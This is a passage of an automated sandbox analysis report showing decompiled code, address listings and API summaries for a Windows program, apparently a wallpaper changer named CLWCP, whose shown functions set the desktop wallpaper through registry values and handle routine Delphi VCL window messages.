					E00404428( &_v8, "\\clwcp.bmp", _v28);
				}
				E00402ACC(2,  &_v32);
				if(E004043DC(_v32) > 0) {
					_t186 = 0;
					E00402ACC(2,  &_v40);
					E00407D2C(_v40, _t156,  &_v36);
					E00404528(_v36, 0x46d274);
					if(0 == 0) {
						_t186 = 1;
					}
					E00402ACC(2,  &_v48);
					E00407D2C(_v48, _t156,  &_v44);
					E00404528(_v44, "stretch");
					if(0 == 0) {
						_t186 = 2;
					}
					_t188 = E004026E4(3);
					_t155 = E004026E4(3);
					_t155[1] = 0;
					 *_t155 = 0x30;
					_t188[1] = 0;
					_t103 = _t186 - 1;
					_t196 = _t103;
					if(_t196 < 0) {
						 *_t188 = 0x30;
					} else {
						if(_t196 == 0) {
							 *_t188 = 0x31;
						} else {
							if(_t103 == 1) {
								 *_t188 = 0x32;
							}
						}
					}
					RegOpenKeyExA(0x80000001, "control panel", 0, 0xf003f,  &_v12);
					RegOpenKeyExA(_v12, "desktop", 0, 0xf003f,  &_v12);
					if(_t186 != 2) {
						RegSetValueExA(_v12, "TileWallpaper", 0, 1, _t188, 1);
						RegSetValueExA(_v12, "Wallpaperstyle", 0, 1, _t155, 1);
					} else {
						RegSetValueExA(_v12, "TileWallpaper", 0, 1, _t155, 1);
						RegSetValueExA(_v12, "Wallpaperstyle", 0, 1, _t188, 1);
					}
					RegFlushKey(_v12);
					RegCloseKey(_v12);
					E00402704(_t188);
					E00402704(_t155);
				}
				_t154 = E004045DC(_v8);
				SystemParametersInfoA(0x14, 0, _t154, 1);
				SystemParametersInfoA(0x14, 0, _t154, 2);
				goto L22;
			}


























                                  0x0046cf81
                                  0x0046cf83
                                  0x0046cf88
                                  0x0046cf88
                                  0x0046cf8a
                                  0x0046cf8c
                                  0x0046cf8c
                                  0x0046cf8f
                                  0x0046cf93
                                  0x0046cf96
                                  0x0046cf9b
                                  0x0046cfa2
                                  0x0046cfa3
                                  0x0046cfa8
                                  0x0046cfab
                                  0x0046cfb1
                                  0x0046cfb6
                                  0x0046cfb7
                                  0x0046d21b
                                  0x0046d21d
                                  0x0046d220
                                  0x0046d223
                                  0x0046d230
                                  0x0046d23d
                                  0x0046d23d
                                  0x0046cfc0
                                  0x0046cfd0
                                  0x0046cfdb
                                  0x0046cfe8
                                  0x0046cfed
                                  0x0046d00d
                                  0x0046d026
                                  0x0046d04b
                                  0x0046d05f
                                  0x0046d063
                                  0x0046d070
                                  0x0046d07b
                                  0x0046d081
                                  0x0046d08c
                                  0x0046d091
                                  0x0046d091
                                  0x0046d09e
                                  0x0046d0ad
                                  0x0046d0b3
                                  0x0046d0bd
                                  0x0046d0c8
                                  0x0046d0d5
                                  0x0046d0da
                                  0x0046d0dc
                                  0x0046d0dc
                                  0x0046d0e9
                                  0x0046d0f4
                                  0x0046d101
                                  0x0046d106
                                  0x0046d108
                                  0x0046d108
                                  0x0046d117
                                  0x0046d123
                                  0x0046d125
                                  0x0046d129
                                  0x0046d12c
                                  0x0046d132
                                  0x0046d132
                                  0x0046d135
                                  0x0046d13e
                                  0x0046d137
                                  0x0046d137
                                  0x0046d143
                                  0x0046d139
                                  0x0046d13a
                                  0x0046d148
                                  0x0046d148
                                  0x0046d13a
                                  0x0046d137
                                  0x0046d160
                                  0x0046d179
                                  0x0046d181
                                  0x0046d1bf
                                  0x0046d1d4
                                  0x0046d183
                                  0x0046d193
                                  0x0046d1a8
                                  0x0046d1a8
                                  0x0046d1dd
                                  0x0046d1e6
                                  0x0046d1ed
                                  0x0046d1f4
                                  0x0046d1f4
                                  0x0046d203
                                  0x0046d20a
                                  0x0046d216
                                  0x00000000

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,control panel,00000000,000F003F,?,00000000,0046D23E,?,?,?,?,00000004,00000000,00000000), ref: 0046D160
                                  • RegOpenKeyExA.ADVAPI32(?,desktop,00000000,000F003F,?,80000001,control panel,00000000,000F003F,?,00000000,0046D23E), ref: 0046D179
                                  • RegSetValueExA.ADVAPI32(?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F,?,80000001,control panel,00000000,000F003F,?), ref: 0046D193
                                  • RegSetValueExA.ADVAPI32(?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F), ref: 0046D1A8
                                  • RegSetValueExA.ADVAPI32(?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F,?,80000001,control panel,00000000,000F003F,?), ref: 0046D1BF
                                  • RegSetValueExA.ADVAPI32(?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000,000F003F), ref: 0046D1D4
                                  • RegFlushKey.ADVAPI32(?,?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop,00000000), ref: 0046D1DD
                                  • RegCloseKey.ADVAPI32(?,?,?,Wallpaperstyle,00000000,00000001,00000000,00000001,?,TileWallpaper,00000000,00000001,00000000,00000001,?,desktop), ref: 0046D1E6
                                  • SystemParametersInfoA.USER32(00000014,00000000,00000000,00000001), ref: 0046D20A
                                  • SystemParametersInfoA.USER32(00000014,00000000,00000000,00000002), ref: 0046D216
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Value$InfoOpenParametersSystem$CloseFlush
                                  • String ID: TileWallpaper$Wallpaperstyle$\clwcp.bmp$control panel$desktop$stretch$tile
                                  • API String ID: 3473239184-3812037043
                                  • Opcode ID: eb66159df3f5a1c45ceef8b8c2b8b197441494a6d078b489aab02ad6eacad25b
                                  • Instruction ID: d6c79ffcc8eb494e13f39c39c31a48f565c435968f6ca50b5fa99879c1bea40a
                                  • Opcode Fuzzy Hash: eb66159df3f5a1c45ceef8b8c2b8b197441494a6d078b489aab02ad6eacad25b
                                  • Instruction Fuzzy Hash: 4F714330F50209ABDB10EBA5C886FDD77A5AF49704F1040B6F604BF2D6D6B8AD01CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004554C4, Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 405COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 112 4554c4-4554f8 113 45552c-455541 call 455378 112->113 114 4554fa-4554fb 112->114 120 455547 113->120 121 4555f2-4555f7 113->121 115 4554fd-455519 call 413d2c 114->115 139 455528-45552a 115->139 140 45551b-455523 115->140 124 45554d-455550 120->124 125 455aa8-455abd call 456824 120->125 122 4555f9 121->122 123 455648-45564d 121->123 130 455980-455988 122->130 131 4555ff-455604 122->131 128 45564f 123->128 129 45566e-455673 123->129 132 4555b0-4555b3 124->132 133 455552 124->133 138 455b7b-455b83 125->138 141 455655-45565a 128->141 142 455ac2-455ac9 128->142 143 455679-45567f 129->143 144 455afb-455b02 129->144 137 45598e-455999 call 43ba58 130->137 130->138 145 455606 131->145 146 45562f-455634 131->146 135 4555b5 132->135 136 4555db-4555de 132->136 147 455558-45555b 133->147 148 45570b-45571b call 45543c 133->148 151 455b4c-455b5d call 4546d4 call 45543c 135->151 152 4555bb-4555be 135->152 153 4555e4-4555e7 136->153 154 455720-45572e call 455bd0 136->154 137->138 202 45599f-4559ae call 43ba58 IsWindowEnabled 137->202 158 455b9a-455ba0 138->158 139->113 139->115 140->158 164 455660-455663 141->164 165 455a69-455a77 IsIconic 141->165 159 455ae3-455af6 call 4562d0 142->159 160 455acb-455ade call 456274 142->160 168 455685 143->168 169 45593d-455959 call 457a50 143->169 166 455b15-455b24 144->166 167 455b04-455b13 144->167 156 45560c-455611 145->156 157 455a19-455a24 145->157 161 455a41-455a4c 146->161 162 45563a-45563d 146->162 149 455b74-455b75 call 45543c 147->149 150 455561 147->150 148->138 197 455b7a 149->197 150->132 151->138 172 4555c4-4555c7 152->172 173 45585e-455865 152->173 175 4555ed 153->175 176 455889-455895 153->176 154->138 182 455613-455619 156->182 183 45568a-45569a 156->183 157->138 170 455a2a-455a3c 157->170 159->138 160->138 161->138 174 455a52-455a64 161->174 185 455643 162->185 186 45595e-45596b call 456034 162->186 164->125 189 455669 164->189 165->138 177 455a7d-455a88 GetFocus 165->177 166->138 167->138 168->149 169->138 170->138 192 455b26-455b4a call 4409e4 call 4553d0 call 45543c 172->192 193 4555cd-4555d0 172->193 173->138 204 45586b-455875 call 40cbb0 call 404028 173->204 174->138 175->149 176->138 190 45589b-4558a5 176->190 177->138 194 455a8e-455a97 call 44c664 177->194 199 455832-455859 SendMessageA 182->199 200 45561f-455624 182->200 205 4556a5-4556ad call 455bec 183->205 206 45569c-4556a1 183->206 185->149 186->138 232 455971-45597b 186->232 189->149 190->138 209 4558ab-4558b5 190->209 192->138 213 455754-455775 call 45543c 193->213 214 4555d6 193->214 194->138 241 455a9d-455aa3 SetFocus 194->241 197->138 199->138 218 455b5f-455b69 call 427c2c call 427d90 200->218 219 45562a 200->219 202->138 243 4559b4-4559c3 call 43ba58 IsWindowVisible 202->243 204->138 205->138 207 4556a3-4556c6 call 45543c 206->207 208 4556b2-4556ba call 455cb0 206->208 207->138 208->138 224 4558b7-4558d3 call 40d158 209->224 225 455930-455938 209->225 249 455777-455794 call 4551a4 PostMessageA 213->249 250 455799-4557b6 call 455144 PostMessageA 213->250 214->149 218->138 219->149 254 455915-45592b GetLastError 224->254 255 4558d5-4558f7 GetProcAddress 224->255 225->138 232->138 241->138 243->138 264 4559c9-455a14 GetFocus call 43ba58 SetFocus call 435de4 SetFocus 243->264 249->138 250->138 254->138 255->138 261 4558fd-455910 255->261 261->138 264->138
                                  C-Code - Quality: 95%
                                  			E004554C4(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t248;
				struct HWND__* _t252;
				struct HWND__* _t254;
				struct HWND__* _t255;
				struct HWND__* _t267;
				intOrPtr _t270;
				struct HWND__* _t273;
				struct HWND__* _t274;
				struct HWND__* _t276;
				intOrPtr* _t277;
				struct HWND__* _t285;
				struct HWND__* _t287;
				void* _t307;
				signed int _t309;
				struct HWND__* _t315;
				struct HWND__* _t316;
				struct HWND__* _t317;
				void* _t318;
				intOrPtr _t342;
				struct HWND__* _t346;
				intOrPtr _t368;
				void* _t372;
				struct HWND__* _t377;
				void* _t378;
				void* _t379;
				intOrPtr _t380;

				_t318 = __ecx;
				_push(_t372);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t379);
				_push(0x455b85);
				_push( *[fs:edx]);
				 *[fs:edx] = _t380;
				 *(_v12 + 0xc) = 0;
				_t307 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1;
				if(_t307 < 0) {
					L5:
					E00455378(_v8, _t318, _v12);
					_t309 =  *_v12;
					_t161 = _t309;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb8) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb8);
									}
									L104:
									_t166 = 0;
									_pop(_t342);
									 *[fs:eax] = _t342;
									goto L105;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E00457A50(_v8,  *(_v12 + 8), _t309) & 0x0000007f;
								} else {
									L103:
									E0045543C(_t379); // executed
								}
								goto L104;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E004562D0(_v8, _t318,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00456274(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L104;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t346 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t346 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t346 + 0x30))) {
										_t191 = E0044C664(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L104;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L92:
								E00456824(_v8,  *(_v12 + 8),  *(_v12 + 4) & 0x0000ffff);
								goto L104;
							} else {
								goto L103;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t311 = _t197;
								_t199 = E0043BA58(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043BA58(_t311));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043BA58(_t311));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x46ef44 = 0;
											_t206 = GetFocus();
											SetFocus(E0043BA58(_t311));
											E00435DE4(_t311,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x46ef44 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L104;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x132));
								if( *((short*)(_t217 + 0x132)) != 0) {
									 *((intOrPtr*)(_v8 + 0x130))();
								}
								goto L104;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E00456034(_v8, _t318, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L104;
							} else {
								goto L103;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x13a));
							if( *((short*)(_t224 + 0x13a)) != 0) {
								 *((intOrPtr*)(_v8 + 0x138))();
							}
							goto L104;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00455BEC(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00455CB0(_v8);
								} else {
									E0045543C(_t379);
								}
							}
							goto L104;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t309 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L104;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							E00427D90(E00427C2C());
							goto L104;
						} else {
							goto L103;
						}
					}
					if(__eflags == 0) {
						goto L92;
					}
					__eflags = _t161 - 0x14;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t248 = _t161 - 0x37;
							__eflags = _t248;
							if(_t248 == 0) {
								 *(_v12 + 0xc) = E00455BD0(_v8);
								goto L104;
							}
							__eflags = _t248 == 0x13;
							if(_t248 == 0x13) {
								_t252 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t252 + 8)))) == 0xde534454) {
									_t254 = _v8;
									__eflags =  *((char*)(_t254 + 0xa6));
									if( *((char*)(_t254 + 0xa6)) != 0) {
										_t255 = _v8;
										__eflags =  *(_t255 + 0xa8);
										if( *(_t255 + 0xa8) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t315 = E0040D158("vcltest3.dll", _t309, 0x8000);
											 *(_v8 + 0xa8) = _t315;
											__eflags = _t315;
											if(_t315 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa8) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t377 = GetProcAddress( *(_v8 + 0xa8), "RegisterAutomation");
												_t316 = _t377;
												__eflags = _t377;
												if(_t377 != 0) {
													_t267 =  *(_v12 + 8);
													_t316->i( *((intOrPtr*)(_t267 + 4)),  *((intOrPtr*)(_t267 + 8)));
												}
											}
										}
									}
								}
								goto L104;
							} else {
								goto L103;
							}
						}
						if(__eflags == 0) {
							_t270 =  *0x470b44; // 0x0
							E004546D4(_t270);
							E0045543C(_t379);
							goto L104;
						}
						_t273 = _t161 - 0x16;
						__eflags = _t273;
						if(_t273 == 0) {
							_t274 = _v12;
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								E0040CBB0();
								E00404028();
							}
							goto L104;
						}
						_t276 = _t273 - 4;
						__eflags = _t276;
						if(_t276 == 0) {
							_t277 =  *0x46fd70; // 0x470aa0
							E004409E4( *_t277, _t318,  *(_v12 + 4));
							E004553D0(_v8, _t309, _t318, _v12, _t372);
							E0045543C(_t379);
							goto L104;
						}
						__eflags = _t276 == 2;
						if(_t276 == 2) {
							E0045543C(_t379);
							_t285 = _v12;
							__eflags =  *((intOrPtr*)(_t285 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0xa5)) = _t285 + 1;
							_t287 = _v12;
							__eflags =  *(_t287 + 4);
							if( *(_t287 + 4) == 0) {
								E00455144();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E004551A4(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L104;
						} else {
							goto L103;
						}
					}
					if(__eflags == 0) {
						 *_v12 = 0x27;
						E0045543C(_t379);
						goto L104;
					}
					__eflags = _t161 - 0x11;
					if(_t161 > 0x11) {
						goto L103;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M00455568))) {
						case 0:
							0 = E0041990C(0, __ebx, __edi, __esi);
							goto L104;
						case 1:
							goto L103;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00406904();
							__eax = E0045543C(__ebp);
							goto L104;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E0045543C(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xb4);
								if( *(__eax + 0xb4) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044C504( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xb4) = __eax;
								}
								_v8 = L0045514C();
							} else {
								__eflags =  *0x46ef58;
								if( *0x46ef58 == 0) {
									_v8 = E004551A4(_v8);
									__eax = _v8;
									__eax =  *(_v8 + 0xb4);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = _v8;
										__edx = 0;
										__eflags = 0;
										 *(_v8 + 0xb4) = 0;
									}
								}
								__eax = E0045543C(__ebp);
							}
							goto L104;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00406864();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E0045543C(__ebp);
							} else {
								__eax = E00455478(__ebp);
							}
							goto L104;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00452770(__eax, __ecx);
							}
							goto L104;
						case 6:
							__eax = _v12;
							 *(_v12 + 0xc) = 1;
							goto L104;
					}
				} else {
					_t317 = _t307 + 1;
					_t378 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E00413D2C( *((intOrPtr*)(_v8 + 0xb0)), _t378)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t368);
						 *[fs:eax] = _t368;
					}
					L105:
					return _t166;
					L4:
					_t378 = _t378 + 1;
					_t317 = _t317 - 1;
					__eflags = _t317;
					if(_t317 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                  0x004554c4
                                  0x004554cb
                                  0x004554cd
                                  0x004554d0
                                  0x004554d5
                                  0x004554d6
                                  0x004554db
                                  0x004554de
                                  0x004554e6
                                  0x004554f5
                                  0x004554f8
                                  0x0045552c
                                  0x00455532
                                  0x0045553a
                                  0x0045553c
                                  0x0045553e
                                  0x00455541
                                  0x004555f2
                                  0x004555f7
                                  0x00455648
                                  0x0045564d
                                  0x0045566e
                                  0x0045566e
                                  0x00455673
                                  0x00455afb
                                  0x00455afe
                                  0x00455b02
                                  0x00455b1e
                                  0x00455b04
                                  0x00455b10
                                  0x00455b10
                                  0x00455b7b
                                  0x00455b7b
                                  0x00455b7d
                                  0x00455b80
                                  0x00000000
                                  0x00455b80
                                  0x0045567c
                                  0x0045567f
                                  0x00455956
                                  0x00455685
                                  0x00455b74
                                  0x00455b75
                                  0x00455b7a
                                  0x00000000
                                  0x0045567f
                                  0x0045564f
                                  0x00455ac2
                                  0x00455ac5
                                  0x00455ac9
                                  0x00455af1
                                  0x00455acb
                                  0x00455ad9
                                  0x00455ad9
                                  0x00000000
                                  0x00455ac9
                                  0x00455655
                                  0x00455655
                                  0x0045565a
                                  0x00455a70
                                  0x00455a75
                                  0x00455a77
                                  0x00455a7d
                                  0x00455a82
                                  0x00455a85
                                  0x00455a88
                                  0x00455a90
                                  0x00455a95
                                  0x00455a97
                                  0x00455a9e
                                  0x00455a9e
                                  0x00455a97
                                  0x00455a88
                                  0x00000000
                                  0x00455a77
                                  0x00455660
                                  0x00455663
                                  0x00455aa8
                                  0x00455ab8
                                  0x00000000
                                  0x00455669
                                  0x00000000
                                  0x00455669
                                  0x00455663
                                  0x004555f9
                                  0x00455983
                                  0x00455986
                                  0x00455988
                                  0x0045598e
                                  0x00455992
                                  0x00455997
                                  0x00455999
                                  0x004559a7
                                  0x004559ac
                                  0x004559ae
                                  0x004559bc
                                  0x004559c1
                                  0x004559c3
                                  0x004559c9
                                  0x004559d0
                                  0x004559df
                                  0x004559f8
                                  0x004559fe
                                  0x00455a03
                                  0x00455a0d
                                  0x00455a0d
                                  0x004559c3
                                  0x004559ae
                                  0x00455999
                                  0x00000000
                                  0x00455988
                                  0x004555ff
                                  0x00455604
                                  0x0045562f
                                  0x0045562f
                                  0x00455634
                                  0x00455a41
                                  0x00455a44
                                  0x00455a4c
                                  0x00455a5e
                                  0x00455a5e
                                  0x00000000
                                  0x00455a4c
                                  0x0045563a
                                  0x0045563d
                                  0x00455964
                                  0x00455969
                                  0x0045596b
                                  0x00455974
                                  0x00455974
                                  0x00000000
                                  0x00455643
                                  0x00000000
                                  0x00455643
                                  0x0045563d
                                  0x00455606
                                  0x00455a19
                                  0x00455a1c
                                  0x00455a24
                                  0x00455a36
                                  0x00455a36
                                  0x00000000
                                  0x00455a24
                                  0x0045560c
                                  0x0045560c
                                  0x00455611
                                  0x00455695
                                  0x00455695
                                  0x0045569a
                                  0x004556a8
                                  0x0045569c
                                  0x0045569c
                                  0x004556a1
                                  0x004556b5
                                  0x004556a3
                                  0x004556c0
                                  0x004556c5
                                  0x004556a1
                                  0x00000000
                                  0x0045569a
                                  0x00455616
                                  0x00455616
                                  0x00455619
                                  0x00455856
                                  0x00000000
                                  0x00455856
                                  0x0045561f
                                  0x00455624
                                  0x00455b64
                                  0x00000000
                                  0x0045562a
                                  0x00000000
                                  0x0045562a
                                  0x00455624
                                  0x00455547
                                  0x00000000
                                  0x00000000
                                  0x0045554d
                                  0x00455550
                                  0x004555b0
                                  0x004555b3
                                  0x004555db
                                  0x004555db
                                  0x004555de
                                  0x0045572b
                                  0x00000000
                                  0x0045572b
                                  0x004555e4
                                  0x004555e7
                                  0x00455889
                                  0x0045588f
                                  0x00455895
                                  0x0045589b
                                  0x0045589e
                                  0x004558a5
                                  0x004558ab
                                  0x004558ae
                                  0x004558b5
                                  0x00455935
                                  0x004558b7
                                  0x004558c6
                                  0x004558cb
                                  0x004558d1
                                  0x004558d3
                                  0x0045591d
                                  0x00455925
                                  0x004558d5
                                  0x004558da
                                  0x004558f1
                                  0x004558f3
                                  0x004558f5
                                  0x004558f7
                                  0x00455900
                                  0x0045590e
                                  0x0045590e
                                  0x004558f7
                                  0x004558d3
                                  0x004558b5
                                  0x004558a5
                                  0x00000000
                                  0x004555ed
                                  0x00000000
                                  0x004555ed
                                  0x004555e7
                                  0x004555b5
                                  0x00455b4c
                                  0x00455b51
                                  0x00455b57
                                  0x00000000
                                  0x00455b5c
                                  0x004555bb
                                  0x004555bb
                                  0x004555be
                                  0x0045585e
                                  0x00455861
                                  0x00455865
                                  0x0045586b
                                  0x00455870
                                  0x00455870
                                  0x00000000
                                  0x00455865
                                  0x004555c4
                                  0x004555c4
                                  0x004555c7
                                  0x00455b2c
                                  0x00455b33
                                  0x00455b3e
                                  0x00455b44
                                  0x00000000
                                  0x00455b49
                                  0x004555cd
                                  0x004555d0
                                  0x00455755
                                  0x0045575b
                                  0x0045575e
                                  0x00455762
                                  0x00455768
                                  0x0045576e
                                  0x00455771
                                  0x00455775
                                  0x0045579c
                                  0x004557b1
                                  0x00455777
                                  0x0045577a
                                  0x0045578f
                                  0x0045578f
                                  0x00000000
                                  0x004555d6
                                  0x00000000
                                  0x004555d6
                                  0x004555d0
                                  0x00455552
                                  0x0045570e
                                  0x00455715
                                  0x00000000
                                  0x0045571a
                                  0x00455558
                                  0x0045555b
                                  0x00000000
                                  0x00000000
                                  0x00455561
                                  0x00000000
                                  0x00455b6d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00455733
                                  0x00455735
                                  0x00455737
                                  0x0045573f
                                  0x00455742
                                  0x00455743
                                  0x00455749
                                  0x00000000
                                  0x00000000
                                  0x004557bb
                                  0x004557be
                                  0x004557c2
                                  0x004557ff
                                  0x00455805
                                  0x00455808
                                  0x0045580f
                                  0x00455811
                                  0x00455814
                                  0x00455817
                                  0x0045581c
                                  0x0045581f
                                  0x0045581f
                                  0x00455828
                                  0x004557c4
                                  0x004557c4
                                  0x004557cb
                                  0x004557d0
                                  0x004557d5
                                  0x004557d8
                                  0x004557de
                                  0x004557e0
                                  0x004557e7
                                  0x004557ea
                                  0x004557ea
                                  0x004557ec
                                  0x004557ec
                                  0x004557e0
                                  0x004557f3
                                  0x004557f8
                                  0x00000000
                                  0x00000000
                                  0x004556e3
                                  0x004556e6
                                  0x004556e9
                                  0x004556ea
                                  0x004556ef
                                  0x004556f1
                                  0x00455700
                                  0x004556f3
                                  0x004556f4
                                  0x004556f9
                                  0x00000000
                                  0x00000000
                                  0x004556cb
                                  0x004556ce
                                  0x004556d1
                                  0x004556d3
                                  0x004556d9
                                  0x004556d9
                                  0x00000000
                                  0x00000000
                                  0x0045587a
                                  0x0045587d
                                  0x00000000
                                  0x00000000
                                  0x004554fa
                                  0x004554fa
                                  0x004554fb
                                  0x00000000
                                  0x004554fd
                                  0x00455519
                                  0x00000000
                                  0x0045551b
                                  0x0045551b
                                  0x0045551d
                                  0x00455520
                                  0x00455520
                                  0x00455b9a
                                  0x00455ba0
                                  0x00455528
                                  0x00455528
                                  0x00455529
                                  0x00455529
                                  0x0045552a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045552a

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RegisterAutomation$vcltest3.dll
                                  • API String ID: 0-2963190186
                                  • Opcode ID: 68f8c3467e92a94db307a236e2a54cc1403cbb5b49ab927b9e5d294fde550756
                                  • Instruction ID: 0745ed38c5f035539d06f538548e9b7a41cfacc9965bda6e2cd1b1a9ea9d92ae
                                  • Opcode Fuzzy Hash: 68f8c3467e92a94db307a236e2a54cc1403cbb5b49ab927b9e5d294fde550756
                                  • Instruction Fuzzy Hash: 01E14C34610A04EFDB00DB69C5D9A6EB7B1AF04316F2581A6E8059B363D738EE49DB09
                                  Uniqueness

                                  Uniqueness Score: -1.00%

